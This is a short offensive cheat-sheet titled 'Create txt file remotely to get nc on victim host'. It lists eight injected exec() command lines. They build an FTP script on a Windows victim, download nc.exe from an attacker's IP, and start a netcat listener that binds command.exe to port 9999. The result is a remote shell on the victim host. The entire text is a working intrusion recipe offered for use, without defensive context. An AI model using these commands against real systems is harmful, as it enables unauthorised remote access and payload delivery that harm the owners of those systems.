Create txt file remotely to get nc on victim host

  1. # str$(exec(“command.exe /c echo user [username] > ftp.txt”))
  2. # str$(exec(“command.exe /c echo pass [password] >> ftp.txt”))
  3. # str$(exec(“command.exe /c echo binary >> ftp.txt”))
  4. # str$(exec(“command.exe /c echo get nc.exe >> ftp.txt”))
  5. # str$(exec(“command.exe /c echo disconnect >> ftp.txt”))
  6. # str$(exec(“command.exe /c echo quit >> ftp.txt”))
  7. # str$(exec(“command.exe /c ftp -i -n -s:ftp.txt [IP OF ATTACKER PC”))
  8. # str$(exec(“nc -l -p 9999 -e command.exe”))